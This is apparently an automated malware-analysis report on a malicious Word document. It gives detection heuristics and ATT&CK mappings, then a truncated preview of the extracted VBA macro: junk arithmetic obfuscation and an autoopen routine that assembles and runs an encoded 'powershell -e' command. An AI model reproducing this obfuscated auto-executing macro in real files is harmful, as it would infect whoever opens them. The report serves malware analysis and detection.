MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro employs obfuscation and uses GetObject, suggesting it attempts to download and execute a secondary payload. The presence of legacy WordBasic markers further supports its malicious intent.
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6895617-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6895617-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 63511 bytes |
SHA-256: a8c858c34b9de3f4ed37c497b9a5f534abc23ce9170fbb2d7007e134dad15bc7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KQAcUAZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function nxAAAGoQ()
If jAAQAUQA = RUADACQc Then
tAcAxDk = 454715534 * OUZUAAA
IZwAA_ = UAQABA - 533947003 + 35956399 + jQ_BAQcG * 622619621 / 209042548 + 744668081 / Chr(104736485 / CSng(820019643 + Round(vZcAUB))) + 667360134 * Log(lUAUAD) - 948886654 - 372609990 + io44AAA_ * CLng(U1CDkCkQ - Atn(FxUABA / 534949009 / 601661375 + NDACDA1))
LADAAAAQ = 170576220 * wUcAQBX
End If
If bQAAQB = jx_BA4UQ Then
FXcBQXQ = 280123386 * MAo4AD
KAXAGBXQ = BAUA1A - 583669001 + 339345002 + AAD_UDBA * 121282177 / 868691420 + 37122038 / Chr(346988138 / CSng(7650982 + Round(XAAZAAc))) + 975611879 * Log(kAcQDx) - 455380760 - 935515761 + nDUw1cBA * CLng(jAUAAZAA - Atn(A_QwxC / 593676486 / 872387310 + iUDABD4C))
DAABB1U = 61931354 * iAwoU1Q
End If
If FBQkwAD = D4AUAw4C Then
UQcA_QAC = 257653419 * qADAAw4
oXADAoCU = PDQBUUkA - 304260100 + 334456682 + qBUADD_ * 994188949 / 4475160 + 91925 / Chr(320345915 / CSng(740496223 + Round(wAABAA))) + 666676286 * Log(VxAcBAX1) - 278261970 - 870879439 + zcUZ4CA * CLng(oABXAZ - Atn(aAB1ocwC / 362614953 / 895749923 + kAoUAxAQ))
oUAGAc = 562840111 * H1BQQADD
End If
If joXUcGDZ = u4AXZkAB Then
GA_cDcC = 334285680 * SAkAcAAA
dBACZB1D = HkADAwAw - 596092142 + 6435043 + QG_AZA * 240839801 / 764156299 + 808231389 / Chr(52494692 / CSng(106295328 + Round(cxZ_AGBA))) + 380448060 * Log(JA1A1k) - 676717503 - 727822569 + NA_oDQB * CLng(FxADwwAA - Atn(uUCxA_ / 428787562 / 470260569 + jDDkA1A))
uAxGUQX = 284546567 * bUDAUA
End If
If pwXw_GD = jGBUcDAc Then
KZ_GZU = 177570453 * akAAGBA
wZUAQkk = vXwZwAk - 86055359 + 938455822 + jQ1AcAB * 536257606 / 920393907 + 183034731 / Chr(549269876 / CSng(813600159 + Round(zcUoAAQ))) + 613206505 * Log(DAxAAA) - 577745510 - 899786189 + z_wCDB14 * CLng(SDXDwAU - Atn(AxD_xD / 808879468 / 921675192 + O4AcAAQA))
tACA4AU = 982473411 * OADUAQoc
End If
If vkAA4AXA = J_UDAC Then
tDQQAC = 421360664 * PAD_U1A
tAk_kAk = IcxAAxC - 247030877 + 527787118 + sAwAAo * 615962088 / 20366346 + 675361335 / Chr(777304463 / CSng(169891946 + Round(iAkAAA))) + 133980931 * Log(cABBGAA) - 516549063 - 154188421 + wAQDA1 * CLng(GXAcBU - Atn(uAB1A__Q / 961281954 / 497244746 + cCAAUD))
bxckxkQX = 919059277 * uUDA4A
End If
End Function
Sub autoopen()
On Error Resume Next
If GDkwBk = SZADAA Then
nkBUC4AA = 717530431 * CADAkX
qAoQwx = ABAQxQUG - 679197136 + 587592201 + bXXZBA * 774010728 / 839324392 + 276798831 / Chr(741094813 / CSng(216296961 + Round(ixQADADQ))) + 763018134 * Log(PwDQCUD) - 517123763 - 355167356 + jCDAXAA * CLng(TQBAQ4 - Atn(M_AQxo / 198988123 / 630318047 + uoGUQZ))
rQAAk_w = 890318886 * TAxD4AAo
End If
If wkCAQQkc = cUAoAA_ Then
jAAcZA = 951914999 * UQDXAw
MU1QkAw = YX4Qxwk - 624769760 + 664869 + H_ABBA * 596978545 / 955793941 + 572342436 / Chr(351923697 / CSng(336205900 + Round(oGQAAQXZ))) + 866206282 * Log(mDZDBcB) - 63313077 - 674025801 + poUw1G1 * CLng(HUBcD_ - Atn(YDUAA_ / 817093587 / 197926522 + U4QABA))
vXXwQwAD = 204088795 * axkQDB1
End If
If BoAoDGAA = TxoQAXA Then
fAwAUcCk = 246736251 * sAB4DAUA
C__BZQ_ = ToA4Bk - 791905716 + 744413295 + WBcABZA_ * 276929451 / 678465470 + 112234862 / Chr(809404754 / CSng(740931675 + Round(cAQ1oA))) + 477184742 * Log(kkBUcZ) - 309129642 - 302763095 + mDAwoD * CLng(JDABkA - Atn(wx_Z_C / 498662693 / 770121532 + vAZQDAA))
HZCAA_ = 370849326 * QkcAACQ1
End If
Dx4cAUk (pB1AU_DQ + "po" + FQGAAQ + "wersh" + bxDGA_ + "ell -e " + BBADC1G1 + a_DAoG + qAUZXA + YooAkAAQ + sUUA_A + wwDAGZ + zQAcAGU + uAkkBQZ)
If iABAAkk = OZAQAAw Then
mDQD4AB = 409507374 * YAZAAoD
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.